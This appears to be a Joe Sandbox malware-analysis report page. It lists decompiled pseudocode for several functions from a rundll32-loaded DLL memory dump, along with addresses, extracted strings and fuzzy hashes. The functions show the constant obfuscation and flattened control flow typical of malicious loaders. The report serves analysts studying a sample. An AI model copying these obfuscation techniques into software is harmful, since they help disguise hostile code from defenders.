0x10009652
0x10009655
0x10009659
0x10009661
0x10009669
0x10009671
0x10009679
0x10009681
0x10009689
0x10009691
0x10009699
0x100096a1
0x100096a9
0x100096b6
0x100096bc
0x100096c9
0x100096e2
0x100096e5
0x100096e9
0x100096f1
0x100096f9
0x10009701
0x10009709
0x1000970e
0x10009716
0x10009726
0x1000972a
0x10009732
0x1000973f
0x10009742
0x1000974e
0x10009752
0x1000975a
0x10009767
0x10009768
0x10009771
0x10009775
0x1000977d
0x1000978b
0x10009794
0x10009798
0x100097a0
0x100097a8
0x100097a8
0x100097b2
0x100097f2
0x100097f7
0x10009839
0x1000984f
0x10009854
0x10009857
0x00000000
0x100097b4
0x100097ba
0x100097ee
0x00000000
0x100097bc
0x100097c2
0x100097dd
0x100097e2
0x100097e7
0x100097ea
0x00000000
0x100097ea
0x100097c2
0x100097ba
0x00000000
0x100097b2
0x1000987f
0x10009884
0x10009887
0x10009889
0x10009889
0x10009889
0x10009898

Strings

p, xrefs: 100096D1
,, xrefs: 10009669
-T, xrefs: 1000957F
V8, xrefs: 10009639

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$-T$V8$p
API String ID: 0-3916372523
Opcode ID: fe2cff7067093b2d558a9cecacae9b5ad41a5273b9a4ffd5d244425a66effca3
Instruction ID: 69ffcb7ec9cb319a1ce736737d15c81d771b3a6a0237c0b4041a3b002347b657
Opcode Fuzzy Hash: fe2cff7067093b2d558a9cecacae9b5ad41a5273b9a4ffd5d244425a66effca3
Instruction Fuzzy Hash: 80A130711093419FE358CF26C98680BFBF1FBC5758F40891DF6A69A2A0D3B599098F82

Uniqueness

Uniqueness Score: -1.00%

Function 100177C0, Relevance: 5.1, Strings: 4, Instructions: 142
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E100177C0(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _t112;
				intOrPtr _t115;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				void* _t124;
				signed int _t136;
				void* _t137;
				signed int _t140;
				intOrPtr* _t143;
				signed int* _t144;

				_t144 =  &_v564;
				_v532 = 0x1772;
				_v532 = _v532 * 0x5a;
				_t143 = __edx;
				_v532 = _v532 >> 9;
				_v532 = _v532 ^ 0x00005570;
				_t120 = __ecx;
				_v536 = 0xd4de;
				_t137 = 0xee39a7c;
				_v536 = _v536 + 0xf33a;
				_v536 = _v536 ^ 0x38a2f836;
				_v536 = _v536 ^ 0x38a37f8b;
				_v548 = 0x7513;
				_v548 = _v548 | 0x052e2a6a;
				_v548 = _v548 ^ 0x1a009472;
				_v548 = _v548 ^ 0x1f2ec1f2;
				_v524 = 0xa699;
				_v524 = _v524 ^ 0x09ca44e2;
				_v524 = _v524 ^ 0x09cad658;
				_v564 = 0x9128;
				_v564 = _v564 >> 2;
				_v564 = _v564 << 9;
				_v564 = _v564 | 0x50e7f59d;
				_v564 = _v564 ^ 0x50ef90e4;
				_v556 = 0x80f2;
				_v556 = _v556 >> 0xb;
				_v556 = _v556 ^ 0x31791c1d;
				_v556 = _v556 + 0x8ae1;
				_v556 = _v556 ^ 0x3179d51e;
				_v540 = 0x4387;
				_t122 = 0x3f;
				_v540 = _v540 / _t122;
				_v540 = _v540 ^ 0x58e2e29e;
				_v540 = _v540 ^ 0x58e2cc49;
				_v552 = 0xa082;
				_v552 = _v552 ^ 0xcad17016;
				_v552 = _v552 + 0xffff4873;
				_v552 = _v552 ^ 0x78230127;
				_v552 = _v552 ^ 0xb2f23b2e;
				_v528 = 0x3f9f;
				_t123 = 0x42;
				_v528 = _v528 / _t123;
				_v528 = _v528 ^ 0x00000484;
				_t136 = _v528;
				_v560 = 0x7d41;
				_v560 = _v560 << 4;
				_v560 = _v560 * 0x2b;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x00006e49;
				_v544 = 0x2431;
				_v544 = _v544 ^ 0x7eed52f8;
				_v544 = _v544 | 0x8f6fe496;
				_v544 = _v544 ^ 0xffefc65f;
				while(_t137 != 0x5fcbc3f) {
					if(_t137 != 0xee39a7c) {
						if(_t137 == 0x11ea9c68) {
							_push( &_v520);
							_t117 = E10002628(_t120, _t143);
							asm("sbb esi, esi");
							_t123 = 0x10001318;
							_t140 =  ~_t117 & 0x1fda4e6f;
							goto L7;
						} else {
							if(_t137 == 0x1790ebe1) {
								return E100091CD(_v552, _v528, _v560, _t136, _v544);
							}
							_t151 = _t137 - 0x376b3a50;
							if(_t137 != 0x376b3a50) {
								L12:
								__eflags = _t137 - 0x7fc7711;
								if(__eflags != 0) {
									continue;
								} else {
									return _t117;
								}
								L16:
							} else {
								_push(_v540);
								_push(0);
								_push(0);
								_push(_t123);
								_push(_v556);
								_push(_v564);
								_t123 = _v548;
								_push( &_v520);
								_push(0);
								_t117 = E100189F6(_t123, _v524, _t151);
								_t144 =  &(_t144[8]);
								asm("sbb esi, esi");
								_t140 =  ~_t117 & 0xee6bd05e;
								L7:
								_t137 = _t140 + 0x1790ebe1;
								continue;
							}
						}
					}
					_t124 = 0x24;
					_t115 = E100157E8(_t124);
					_t136 = _t115;
					_t123 = _t123;
					__eflags = _t136;
					if(__eflags != 0) {
						_t137 = 0x11ea9c68;
						continue;
					}
					return _t115;
					goto L16;
				}
				 *((intOrPtr*)(_t136 + 0x20)) = _t120;
				_t137 = 0x7fc7711;
				_t112 =  *0x10021400; // 0x0
				 *((intOrPtr*)(_t136 + 0x10)) = _t112;
				 *0x10021400 = _t136;
				goto L12;
			}

0x100177c0
0x100177c6
0x100177d7
0x100177db
0x100177dd
0x100177e4
0x100177ec
0x100177ee
0x100177f6
0x100177fb
0x10017803
0x1001780b
0x10017813
0x1001781b
0x10017823
0x1001782b
0x10017833
0x1001783b
0x10017843
0x1001784b
0x10017853
0x10017858
0x1001785d
0x10017865
0x1001786d
0x10017875
0x1001787a
0x10017882
0x1001788a
0x10017892
0x100178a0
0x100178a5
0x100178ab
0x100178b3
0x100178bb
0x100178c3
0x100178cb
0x100178d3
0x100178db
0x100178e3
0x100178ef
0x100178f2
0x100178f6
0x100178fe
0x10017902
0x1001790a
0x10017914
0x10017918
0x1001791d
0x10017925
0x1001792d
0x10017935
0x1001793d
0x10017945
0x10017957
0x1001795f
0x100179bb
0x100179c3
0x100179cd
0x100179cf
0x100179d0
0x00000000
0x10017961
0x10017967
0x00000000
0x10017a34
0x1001796d
0x10017973
0x10017a10
0x10017a10
0x10017a16
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10017979
0x10017979
0x10017981
0x10017983
0x10017985
0x10017986
0x1001798a
0x10017992
0x10017996
0x10017997
0x10017999
0x1001799e
0x100179a5
0x100179a7
0x100179ad
0x100179ad
0x00000000
0x100179ad
0x10017973
0x1001795f
0x100179e3
0x100179e4
0x100179e9
0x100179eb
0x100179ec
0x100179ee
0x100179f0
0x00000000
0x100179f0
0x10017a41
0x00000000
0x10017a41
0x100179fa
0x100179fd
0x10017a02
0x10017a07
0x10017a0a
0x00000000

Strings

P:k7, xrefs: 1001796D
In, xrefs: 1001791D
pU, xrefs: 100177E4
1$, xrefs: 10017925

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$$In$P:k7$pU
API String ID: 0-2106264963
Opcode ID: a6b8b6057752e44647db78beeb2ee1f3202c3f20c0f29efe6dfe5a7aead6b88d
Instruction ID: 2e7f08dc6bef0bd5653fe598f332924a89a4fdabe7864c0509b3b532d9c0389b
Opcode Fuzzy Hash: a6b8b6057752e44647db78beeb2ee1f3202c3f20c0f29efe6dfe5a7aead6b88d
Instruction Fuzzy Hash: D2516B719083419BD358DF21D48694BBBF0FBC8758F501A1DF9DAAA260C3B4DA49CB87

Uniqueness

Uniqueness Score: -1.00%

Function 1001DEE8, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E1001DEE8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				void* _t134;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t134);
				_v56 = _v56 & 0x00000000;
				_v60 = 0x429fa3;
				_v16 = 0x8df8;
				_v16 = _v16 | 0x5bad6fdd;
				_v16 = _v16 ^ 0x1c317be5;
				_v16 = _v16 ^ 0x479cc3d4;
				_v12 = 0xa64d;
				_t151 = 0x35;
				_v12 = _v12 / _t151;
				_v12 = _v12 + 0xfffff8cf;
				_v12 = _v12 | 0x0b89d292;
				_v12 = _v12 ^ 0xffff912a;
				_v8 = 0x343c;
				_v8 = _v8 + 0xdfbd;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x831c11fe;
				_v8 = _v8 ^ 0x831c1bf9;
				_v20 = 0xd2ea;
				_v20 = _v20 << 0xb;
				_v20 = _v20 + 0xffff01f9;
				_t152 = 0x3f;
				_v20 = _v20 / _t152;
				_v20 = _v20 ^ 0x001a8b92;
				_v52 = 0xabad;
				_v52 = _v52 ^ 0xf345eb5d;
				_v52 = _v52 ^ 0xf3453027;
				_v40 = 0x2a5b;
				_v40 = _v40 ^ 0x8a944271;
				_v40 = _v40 + 0xffff3ddd;
				_v40 = _v40 ^ 0x8a93ae26;
				_v36 = 0xa033;
				_t153 = 0x2a;
				_v36 = _v36 / _t153;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x000061ee;
				_v32 = 0x8be0;
				_v32 = _v32 | 0xe631180e;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x19bef193;
				_v48 = 0xa7b3;
				_t154 = 0x44;
				_v48 = _v48 * 0x60;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0xb8c85214;
				_v28 = 0x762;
				_v28 = _v28 | 0x9c151205;
				_v28 = _v28 << 8;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x0015065a;
				_v44 = 0x58a5;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 / _t154;
				_v44 = _v44 ^ 0x00007339;
				_v24 = 0xfaea;
				_v24 = _v24 << 3;
				_v24 = _v24 + 0xd2b0;
				_t155 = 3;
				_push(0x100015c0);
				_v24 = _v24 / _t155;
				_v24 = _v24 ^ 0x00028589;
				_push(_v8);
				E100163BF(E1001BF25(_v16, _v12, _v24), _v24, _v52, _v40, __edx, _v16, _v36, _a12, _a8, _v32);
				return E1001C5F7(_v48, _v28, _v44, _v24, _t147);
			}

0x1001def0
0x1001def5
0x1001def8
0x1001defb
0x1001defe
0x1001deff
0x1001df00
0x1001df05
0x1001df0b
0x1001df12
0x1001df19
0x1001df20
0x1001df27
0x1001df2e
0x1001df3a
0x1001df3f
0x1001df44
0x1001df4b
0x1001df52
0x1001df59
0x1001df60
0x1001df67
0x1001df6b
0x1001df72
0x1001df79
0x1001df80
0x1001df84
0x1001df8e
0x1001df93
0x1001df98
0x1001df9f
0x1001dfa6
0x1001dfad
0x1001dfb4
0x1001dfbb
0x1001dfc2
0x1001dfc9
0x1001dfd0
0x1001dfda
0x1001dfdf
0x1001dfe4
0x1001dfe8
0x1001dfef
0x1001dff6
0x1001dffd
0x1001e001
0x1001e008
0x1001e013
0x1001e014
0x1001e017
0x1001e01b
0x1001e022
0x1001e029
0x1001e030
0x1001e034
0x1001e038
0x1001e03f
0x1001e046
0x1001e04f
0x1001e052
0x1001e059
0x1001e060
0x1001e066
0x1001e072
0x1001e075
0x1001e07a
0x1001e07d
0x1001e084
0x1001e0b0
0x1001e0cf

Strings

<4, xrefs: 1001DF59
a, xrefs: 1001DFE8
[*, xrefs: 1001DFB4
9s, xrefs: 1001E052

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9s$<4$[*$a
API String ID: 0-239331953
Opcode ID: d0e58df00b0c86ff922bd6907dfca745df99386b0e2c539687ea4503f84d7d05
Instruction ID: 5a9fb4e3a59909fd41fb50e737628130f046b5500317e57dd636ad6f2bf099bc
Opcode Fuzzy Hash: d0e58df00b0c86ff922bd6907dfca745df99386b0e2c539687ea4503f84d7d05
Instruction Fuzzy Hash: 06512571D00219EBDF08CFE5D94A8DEBBB2FB48314F208119E521B62A0D7B95A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 100199A4, Relevance: 4.0, Strings: 3, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E100199A4() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t279;
				short _t282;
				void* _t290;
				void* _t291;
				void* _t315;
				short* _t316;
				void* _t317;
				short* _t318;
				short* _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;

				_v88 = 0x9528;
				_t315 =  *0x100221b0 + 0x10;
				_v88 = _v88 << 0x10;
				_t291 = 0x29b6ea94;
				_v88 = _v88 ^ 0x95285eaa;
				_v84 = 0xe890;
				_t320 = 0x34;
				_v84 = _v84 * 0x1f;
				_v84 = _v84 ^ 0x001c45a3;
				_v28 = 0x9112;
				_v28 = _v28 / _t320;
				_t321 = 0x19;
				_v28 = _v28 * 0x31;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x088a98e7;
				_v52 = 0xda31;
				_v52 = _v52 >> 8;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x000066fb;
				_v24 = 0xe82b;
				_v24 = _v24 ^ 0xb4fe6801;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 | 0xa81c026a;
				_v24 = _v24 ^ 0xa83d3e65;
				_v20 = 0x6909;
				_v20 = _v20 + 0xffffc42e;
				_v20 = _v20 << 0xd;
				_v20 = _v20 / _t321;
				_v20 = _v20 ^ 0x0039e32c;
				_v60 = 0xab82;
				_v60 = _v60 + 0xffff0bd3;
				_t322 = 0xf;
				_v60 = _v60 * 0x76;
				_v60 = _v60 ^ 0xffdec8c4;
				_v56 = 0x5e59;
				_v56 = _v56 / _t322;
				_v56 = _v56 >> 0xb;
				_v56 = _v56 ^ 0x00001434;
				_v96 = 0x977a;
				_t323 = 0x6f;
				_v96 = _v96 * 0x61;
				_v96 = _v96 ^ 0x00397eb3;
				_v92 = 0xa291;
				_v92 = _v92 | 0x42e1adc5;
				_v92 = _v92 ^ 0x42e1b77e;
				_v40 = 0x73d4;
				_v40 = _v40 / _t323;
				_v40 = _v40 << 1;
				_v40 = _v40 * 0x4a;
				_v40 = _v40 ^ 0x0000cc60;
				_v36 = 0x33bd;
				_v36 = _v36 >> 5;
				_v36 = _v36 ^ 0xc340ad00;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0x0564fa7a;
				_v64 = 0xc60;
				_v64 = _v64 | 0x04416794;
				_t324 = 0x5f;
				_v64 = _v64 * 0xd;
				_v64 = _v64 ^ 0x3752d4dc;
				_v32 = 0xae9f;
				_v32 = _v32 + 0x24a;
				_v32 = _v32 + 0xffffd123;
				_t325 = 0x3d;
				_v32 = _v32 / _t324;
				_v32 = _v32 ^ 0x0000400c;
				_v72 = 0x4f8e;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x027c6373;
				_v12 = 0x21f4;
				_v12 = _v12 + 0x1717;
				_v12 = _v12 * 0x19;
				_v12 = _v12 + 0xffff4c52;
				_v12 = _v12 ^ 0x00049658;
				_v8 = 0xd7dc;
				_v8 = _v8 ^ 0x4ae28678;
				_v8 = _v8 * 0x67;
				_v8 = _v8 + 0xffff8b2b;
				_v8 = _v8 ^ 0x210e6813;
				_v44 = 0x10ca;
				_v44 = _v44 * 0xe;
				_v44 = _v44 ^ 0x21d1d5f5;
				_v44 = _v44 ^ 0x21d123f7;
				_v48 = 0xfc7c;
				_v48 = _v48 ^ 0x12e29e7b;
				_v48 = _v48 ^ 0x780ab142;
				_v48 = _v48 ^ 0x6ae8c2ee;
				_v80 = 0x56f;
				_t326 = 0x77;
				_v80 = _v80 / _t325;
				_v80 = _v80 ^ 0x0000686a;
				_v16 = 0x940a;
				_v16 = _v16 ^ 0x3241511d;
				_v16 = _v16 << 2;
				_v16 = _v16 | 0x2c0ae0b9;
				_v16 = _v16 ^ 0xed0fff5b;
				_v76 = 0xb74;
				_v76 = _v76 | 0xff1ac2c7;
				_v76 = _v76 ^ 0xff1aa207;
				_v108 = 0xf16f;
				_v108 = _v108 + 0xffff55fa;
				_v108 = _v108 ^ 0x00000b68;
				_v104 = 0x7f0f;
				_v104 = _v104 / _t326;
				_v104 = _v104 ^ 0x00004c16;
				_v68 = 0xc425;
				_v68 = _v68 << 0xf;
				_v68 = _v68 | 0xc23afe3b;
				_v68 = _v68 ^ 0xe23ab7b9;
				_v100 = 0xccd6;
				_v100 = _v100 | 0x04b2265a;
				_v100 = _v100 ^ 0x04b29fa8;
				_t290 = 2;
				do {
					while(_t291 != 0x2226ace9) {
						if(_t291 == 0x2622bc84) {
							_push(_t291);
							_t327 = E1000607F(_t291, __eflags, _t291, 0x10, 4);
							E1000D940(_t315, _v56, _v96, _v92, _t290,  &_v112, 1);
							_t317 = _t315 + _t290;
							E1000D940(_t317, _v36, _v64, _v32, 1,  &_v112, _t327);
							_t329 = _t329 + 0x40;
							_t318 = _t317 + _t327 * 2;
							_t291 = 0x29e4095b;
							_t279 = 0x5c;
							 *_t318 = _t279;
							_t315 = _t318 + _t290;
							continue;
						} else {
							if(_t291 == 0x29b6ea94) {
								_t282 = E10017B6B();
								_v112 = _t282;
								_t291 = 0x2622bc84;
								continue;
							} else {
								_t334 = _t291 - 0x29e4095b;
								if(_t291 == 0x29e4095b) {
									_push(_t291);
									_t328 = E1000607F(_t291, _t334, _t291, 0x10, 4);
									E1000D940(_t315, _v80, _v16, _v76, 1,  &_v112, _t328);
									_t329 = _t329 + 0x28;
									_t319 = _t315 + _t328 * 2;
									_t291 = 0x2226ace9;
									_t282 = 0x2e;
									 *_t319 = _t282;
									_t315 = _t319 + _t290;
									continue;
								}
							}
						}
						goto L9;
					}
					E1000D940(_t315, _v104, _v68, _v100, 1,  &_v112, 3);
					_t316 = _t315 + 6;
					_t329 = _t329 + 0x18;
					_t291 = 0x2b0037fd;
					 *_t316 = 0;
					_t315 = _t316 + _t290;
					__eflags = _t315;
					L9:
					__eflags = _t291 - 0x2b0037fd;
				} while (__eflags != 0);
				return _t282;
			}

0x100199b5
0x100199bc
0x100199bf
0x100199c3
0x100199c8
0x100199cf
0x100199dc
0x100199df
0x100199e2
0x100199e9
0x100199f7
0x100199fe
0x10019a01
0x10019a04
0x10019a08
0x10019a0f
0x10019a16
0x10019a1a
0x10019a1e
0x10019a25
0x10019a2c
0x10019a33
0x10019a37
0x10019a3e
0x10019a45
0x10019a4c
0x10019a53
0x10019a5e
0x10019a61
0x10019a68
0x10019a6f
0x10019a7a
0x10019a7d
0x10019a80
0x10019a87
0x10019a95
0x10019a98
0x10019a9c
0x10019aa3
0x10019aae
0x10019aaf
0x10019ab2
0x10019ab9
0x10019ac0
0x10019ac7
0x10019ace
0x10019ada
0x10019add
0x10019ae4
0x10019ae7
0x10019aee
0x10019af5
0x10019af9
0x10019b00
0x10019b04
0x10019b0b
0x10019b12
0x10019b21
0x10019b24
0x10019b27
0x10019b2e
0x10019b35
0x10019b3c
0x10019b48
0x10019b49
0x10019b4e
0x10019b55
0x10019b5c
0x10019b60
0x10019b67
0x10019b6e
0x10019b7b
0x10019b7e
0x10019b85
0x10019b8c
0x10019b93
0x10019b9e
0x10019ba1
0x10019ba8
0x10019baf
0x10019bba
0x10019bbd
0x10019bc4
0x10019bcb
0x10019bd2
0x10019bd9
0x10019be0
0x10019be7
0x10019bf3
0x10019bf4
0x10019bf9
0x10019c00
0x10019c07
0x10019c0e
0x10019c12
0x10019c19
0x10019c20
0x10019c27
0x10019c2e
0x10019c35
0x10019c3c
0x10019c43
0x10019c4a
0x10019c58
0x10019c5b
0x10019c62
0x10019c69
0x10019c6d
0x10019c74
0x10019c7b
0x10019c82
0x10019c89
0x10019c90
0x10019c91
0x10019c91
0x10019ca3
0x10019d25
0x10019d32
0x10019d47
0x10019d50
0x10019d63
0x10019d68
0x10019d6b
0x10019d6e
0x10019d75
0x10019d76
0x10019d79
0x00000000
0x10019ca5
0x10019cab
0x10019d07
0x10019d0c
0x10019d0f
0x00000000
0x10019cad
0x10019cad
0x10019cb3
0x10019cc5
0x10019cd0
0x10019ce7
0x10019cec
0x10019cef
0x10019cf2
0x10019cf9
0x10019cfa
0x10019cfd
0x00000000
0x10019cfd
0x10019cb3
0x10019cab
0x00000000
0x10019ca3
0x10019d96
0x10019d9b
0x10019da0
0x10019da3
0x10019da8
0x10019dab
0x10019dab
0x10019dad
0x10019dad
0x10019dad
0x10019dbf

Strings

[), xrefs: 10019D6E
[), xrefs: 10019CAD
,9, xrefs: 10019A61

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,9$[)$[)
API String ID: 0-3362820381
Opcode ID: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
Instruction ID: 44abcb00151ec1b00a79a92a733cf4ca5547ce6a62ffc74197264c17b034da66
Opcode Fuzzy Hash: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
Instruction Fuzzy Hash: 2AC13475D00309DBEB18CFE5D98A9DEBBB6FB44304F208119E116BB2A4C3B55A46CF40

Uniqueness

Uniqueness Score: -1.00%

Function 1000D0DE, Relevance: 3.9, Strings: 3, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1000D0DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t133;
				void* _t144;
				signed int _t153;
				signed int _t154;
				void* _t157;
				void* _t169;
				void* _t170;
				signed int* _t173;

				_push(_a16);
				_t169 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t133);
				_v48 = 0x5a8b;
				_t173 =  &(( &_v60)[6]);
				_v48 = _v48 ^ 0x4360b52a;
				_v48 = _v48 ^ 0x1a806351;
				_t170 = 0;
				_v48 = _v48 >> 2;
				_t157 = 0x13068ceb;
				_v48 = _v48 ^ 0x1678233d;
				_v8 = 0x8630;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00000862;
				_v52 = 0x326b;
				_v52 = _v52 >> 1;
				_v52 = _v52 | 0xc7f7cfdb;
				_v52 = _v52 ^ 0x87f7dfff;
				_v12 = 0x4e1;
				_v12 = _v12 | 0x6d92ca4a;
				_v12 = _v12 ^ 0x2d92ceeb;
				_v28 = 0xfb25;
				_v28 = _v28 | 0x71bf14c1;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0xbfffdb80;
				_v32 = 0xf237;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000074ee;
				_v36 = 0xcd16;
				_t153 = 0x3c;
				_v36 = _v36 * 0x44;
				_v36 = _v36 ^ 0x3fdc784b;
				_v36 = _v36 ^ 0x3fea737c;
				_v20 = 0xb3fe;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x00007694;
				_v56 = 0xdd00;
				_v56 = _v56 * 0x23;
				_v56 = _v56 + 0xffff9337;
				_v56 = _v56 << 7;
				_v56 = _v56 ^ 0x0ee528fc;
				_v60 = 0xf711;
				_v60 = _v60 >> 4;
				_v60 = _v60 | 0x4989a590;
				_v60 = _v60 + 0xffff6a05;
				_v60 = _v60 ^ 0x49891a0f;
				_v40 = 0x92cf;
				_v40 = _v40 ^ 0xf586a06e;
				_v40 = _v40 + 0xffff6eef;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0xb4326dcb;
				_v44 = 0x65dd;
				_v44 = _v44 / _t153;
				_v44 = _v44 << 6;
				_v44 = _v44 + 0xffff872c;
				_v44 = _v44 ^ 0xffffb82a;
				_v16 = 0xf090;
				_t154 = 0x21;
				_v16 = _v16 / _t154;
				_v16 = _v16 ^ 0x00005a72;
				_v24 = 0xb1df;
				_v24 = _v24 * 6;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x08564d31;
				while(_t157 != 0x13068ceb) {
					if(_t157 == 0x32a00bf2) {
						_t144 = E1001551E(_a16,  &_v4, _v28, _t169, 0, _v52 | _v48, _v32, _v36, _v20);
						_t173 =  &(_t173[7]);
						if(_t144 != 0) {
							_t157 = 0x39bb1850;
							continue;
						}
					} else {
						if(_t157 == 0x367d931e) {
							E1001551E(_a16,  &_v4, _v40, _t169, _t170, _v12 | _v8, _v44, _v16, _v24);
						} else {
							if(_t157 != 0x39bb1850) {
								L10:
								if(_t157 != 0x1d94fa77) {
									continue;
								} else {
								}
							} else {
								_push(_t157);
								_t170 = E100157E8(_v4 + _v4);
								if(_t170 != 0) {
									_t157 = 0x367d931e;
									continue;
								}
							}
						}
					}
					return _t170;
				}
				_t157 = 0x32a00bf2;
				goto L10;
			}

0x1000d0e5
0x1000d0e9
0x1000d0eb
0x1000d0ef
0x1000d0f3
0x1000d0f7
0x1000d0f8
0x1000d0f9
0x1000d0fe
0x1000d106
0x1000d109
0x1000d113
0x1000d11b
0x1000d11d
0x1000d122
0x1000d127
0x1000d12f
0x1000d137
0x1000d13c
0x1000d144
0x1000d14c
0x1000d150
0x1000d158
0x1000d160
0x1000d168
0x1000d170
0x1000d178
0x1000d180
0x1000d188
0x1000d18d
0x1000d195
0x1000d19d
0x1000d1a2
0x1000d1a7
0x1000d1af
0x1000d1be
0x1000d1c1
0x1000d1c5
0x1000d1cd
0x1000d1d5
0x1000d1dd
0x1000d1e2
0x1000d1ea
0x1000d1f7
0x1000d1fb
0x1000d203
0x1000d208
0x1000d210
0x1000d218
0x1000d21d
0x1000d225
0x1000d22d
0x1000d235
0x1000d23d
0x1000d245
0x1000d24d
0x1000d252
0x1000d25a
0x1000d26a
0x1000d26e
0x1000d273
0x1000d27b
0x1000d283
0x1000d28f
0x1000d292
0x1000d296
0x1000d29e
0x1000d2b5
0x1000d2b9
0x1000d2be
0x1000d2c6
0x1000d2d0
0x1000d322
0x1000d327
0x1000d32c
0x1000d32e
0x00000000
0x1000d32e
0x1000d2d2
0x1000d2d4
0x1000d364
0x1000d2d6
0x1000d2dc
0x1000d337
0x1000d33d
0x00000000
0x00000000
0x1000d33f
0x1000d2de
0x1000d2ea
0x1000d2f3
0x1000d2f8
0x1000d2fa
0x00000000
0x1000d2fa
0x1000d2f8
0x1000d2dc
0x1000d2d4
0x1000d375
0x1000d375
0x1000d335
0x00000000

Strings

rZ, xrefs: 1000D296
k2, xrefs: 1000D144
|s?, xrefs: 1000D1CD

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
